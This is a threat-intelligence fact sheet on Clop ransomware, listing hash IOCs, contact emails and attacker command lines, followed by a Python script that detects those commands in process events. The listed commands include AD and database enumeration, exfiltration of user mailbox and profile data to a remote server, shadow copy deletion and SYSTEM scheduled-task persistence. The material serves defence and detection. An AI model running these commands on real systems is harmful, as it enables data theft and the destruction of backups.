Clop Ransomware:
Clop ransomware spreads via executables carrying legitimate digital signatures and targets entire networks rather than individual users.
Country of Origin: Russia
Appended File Extension:
- [.]Clop
Top Affected Countries:
- USA
- Spain
- India
Top Affected Industries:
- Healthcare
- Financial
- Media
Gang Name: Silence
IOCs (MD5 hashes):
- 0403DB9FCB37BD8CEEC0AFD6C3754314
- 160FD326A825271E9BD71653BA6F3EE1
- 227A9F4931342F8B49CB3044F66DBF05
- 25E11A9EBDE8D2CC26084E3C739273A7
- 279F5BEEE9D4BF8C54026E78ACBA61B1
- 35792C5501760071D461E9455AA50730
- 3FE02FDD243979106F6D91AE2DF8CCFF
- 569D3ED52F17B12729CEF26018C81FB9
- 72A76CA18B85E64A8C655C94BE087C5E
- 738314AA6E07F9A625E4774AC1243A79
- 73FBFBB0FB34E2696E5F3D9A9D2F6D46
- 949670DCDED69C76760D87F2271E0631
- A09CE9363467F0CDD72714945CF0BF3A
- A93B3DAA9460C64C631AD076D8ED126E
- AE0C9765CC0BC9F4D2ED8970FF77A8D1
- AE5CB860F043CAA84BF4E11CEC758616
- B7FD25034019BC0B09242047D2C1D62A
- C41A0E1DDEB85B6326A3DC403A5FD0FA
- D8DF0EEE17FA5A361E26D67C43E10F28
- ED7DB8C2256B2D5F36B3D9C349A6ED0B
Emails:
- servicedigilogos[at]protonmail[.]com
- managersmaers[at]tutanota[.]com
- unlock[at]goldenbay[.]su
- unlock[at]graylegion[.]su
- unlock[at]eqaltech[.]su
- unlock[at]royalmail[.]su
- kensgilbomet[at]protonmail[.]com
URLs:
N/A
IPs:
N/A
Commonly Used Commands:
adfind.exe -f &(objectcategory=computer) operatingsystem -csv
adfind -f objectcategory=person samaccountname name displayname givenname department description title mail logoncount -csv
adfind.exe -h <redacted> -f &(objectcategory=computer) operatingsystem samaccountname name displayname givenname department description title mail logoncount -csv
sqlcmd -q select name from sys.databases
sqlcmd -s <hostname> -q select name from sys.databases
sqlcmd -s <hostname> -q set nocount on; select table_name from information_schema.tables where table_type = 'base table' -h -1 -w -e -d cct_db
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\onedrive
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /M:*.ost /M:*.pst /P:<remote path> /d:\\<local network host>\c$\users\<username>\appdata\local\microsoft\outlook
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\downloads
C:\Windows\System32\wbem\WMIC.exe shadowcopy where ID=<redacted> delete
C:\windows\WinCDropQSysvolY.exe
C:\windows\WinCDropQSysvolY.exe runrun
schtasks.exe /create /tn OneDrvTest /tr C:\windows\SysZDropQLogonQ.exe /s <redacted> /sc onstart /ru system /f
schtasks.exe /run /tn OneDrvTest /s <redacted>
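The command lines above map onto a handful of detectable behaviours: AD enumeration with AdFind, database enumeration with sqlcmd, a collection tool pushing user-profile data to a remote host over port 443, shadow copy deletion with WMIC, and SYSTEM-level scheduled-task persistence. The following is an added detection example (not part of this fact sheet and not a vendor rule set): it turns each of those command patterns into a regular-expression rule, runs them over a constructed set of process-creation events, and sweeps file hashes against the MD5 list on this page. The event records, the host and user names, the `collect.exe` tool name and the `203.0.113.10` address are all constructed placeholders; the real tool name is redacted on the page.

```python
import re

# MD5 IOCs copied from the list on this page, normalised to upper case.
CLOP_MD5_IOCS = frozenset({
    "0403DB9FCB37BD8CEEC0AFD6C3754314", "160FD326A825271E9BD71653BA6F3EE1",
    "227A9F4931342F8B49CB3044F66DBF05", "25E11A9EBDE8D2CC26084E3C739273A7",
    "279F5BEEE9D4BF8C54026E78ACBA61B1", "35792C5501760071D461E9455AA50730",
    "3FE02FDD243979106F6D91AE2DF8CCFF", "569D3ED52F17B12729CEF26018C81FB9",
    "72A76CA18B85E64A8C655C94BE087C5E", "738314AA6E07F9A625E4774AC1243A79",
    "73FBFBB0FB34E2696E5F3D9A9D2F6D46", "949670DCDED69C76760D87F2271E0631",
    "A09CE9363467F0CDD72714945CF0BF3A", "A93B3DAA9460C64C631AD076D8ED126E",
    "AE0C9765CC0BC9F4D2ED8970FF77A8D1", "AE5CB860F043CAA84BF4E11CEC758616",
    "B7FD25034019BC0B09242047D2C1D62A", "C41A0E1DDEB85B6326A3DC403A5FD0FA",
    "D8DF0EEE17FA5A361E26D67C43E10F28", "ED7DB8C2256B2D5F36B3D9C349A6ED0B",
})

# Behavioural rules derived from the command lines listed on this page.
# Each entry: (rule name, regex applied to the full command line, analyst note).
RULES = [
    ("ad_enumeration_adfind",
     re.compile(r"\badfind(\.exe)?\b.*-f\s+.*objectcategory=(computer|person)", re.I),
     "Active Directory enumeration of computers or users with AdFind"),
    ("mssql_enumeration",
     re.compile(r"\bsqlcmd\b.*(sys\.databases|information_schema\.tables)", re.I),
     "Database and table enumeration with sqlcmd"),
    ("shadow_copy_deletion",
     re.compile(r"\bwmic(\.exe)?\s+shadowcopy\b.*\bdelete\b", re.I),
     "Volume shadow copy deletion ahead of encryption"),
    ("schtasks_system_persistence",
     re.compile(r"\bschtasks(\.exe)?\b.*/create\b.*/ru\s+system\b", re.I),
     "Scheduled task created to run as SYSTEM on a remote host"),
    ("exfil_tool_to_port_443",
     re.compile(r"/RH:\S+.*/RP:443\b.*/MX?:", re.I),
     "Collection tool pushing profile data to a remote host over 443"),
]


def match_rules(command_line: str) -> list[str]:
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, pattern, _ in RULES if pattern.search(command_line)]


def scan_events(events: list[dict]) -> list[dict]:
    """Run every rule over process-creation events; keep only events with a hit."""
    hits = []
    for event in events:
        names = match_rules(event["command_line"])
        if names:
            hits.append({"host": event["host"], "user": event["user"], "rules": names})
    return hits


def is_known_clop_hash(md5_hex: str) -> bool:
    """Case-insensitive lookup of a file's MD5 against the IOC list above."""
    return md5_hex.strip().upper() in CLOP_MD5_IOCS


# Constructed sample events (not real telemetry); the first five mirror the
# command shapes on this page, the last two are benign administrative activity.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe",
     "command_line": r"adfind.exe -f &(objectcategory=computer) operatingsystem -csv"},
    {"host": "WS01", "user": "CORP\\jdoe",
     "command_line": r"sqlcmd -s SQL01 -q select name from sys.databases"},
    {"host": "WS01", "user": "CORP\\jdoe",
     "command_line": r"C:\Windows\System32\wbem\WMIC.exe shadowcopy where ID=PLACEHOLDER delete"},
    {"host": "WS01", "user": "CORP\\jdoe",
     "command_line": r"schtasks.exe /create /tn OneDrvTest /tr C:\windows\SysZDropQLogonQ.exe /s DC01 /sc onstart /ru system /f"},
    {"host": "WS01", "user": "CORP\\jdoe",  # collect.exe and the address are constructed placeholders
     "command_line": r"collect.exe /RH:203.0.113.10 /RP:443 /x:pw /MX:thumbs.db /M:*.ost /M:*.pst /P:/in /d:\\WS02\c$\users\jdoe\appdata\local\microsoft\outlook"},
    {"host": "WS02", "user": "CORP\\svc_backup",
     "command_line": r"schtasks.exe /query /tn BackupNightly"},
    {"host": "SQL01", "user": "CORP\\dba",
     "command_line": r'sqlcmd -S SQL01 -Q "select count(*) from orders"'},
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"{hit['host']:6} {hit['user']:16} {', '.join(hit['rules'])}")
    print("hash match:", is_known_clop_hash("0403db9fcb37bd8ceec0afd6c3754314"))
```

The rules key on the arguments rather than the binary path because the page shows AdFind and sqlcmd invoked both with and without the `.exe` suffix and from unspecified directories; the exfiltration rule keys on the `/RH:`, `/RP:443` and `/M`/`/MX` switch shape for the same reason, since the tool's own name is redacted. Any hit on `shadow_copy_deletion` or `schtasks_system_persistence` from an ordinary user account warrants immediate triage; the enumeration rules are noisier and are best correlated with the others on the same host within a short window.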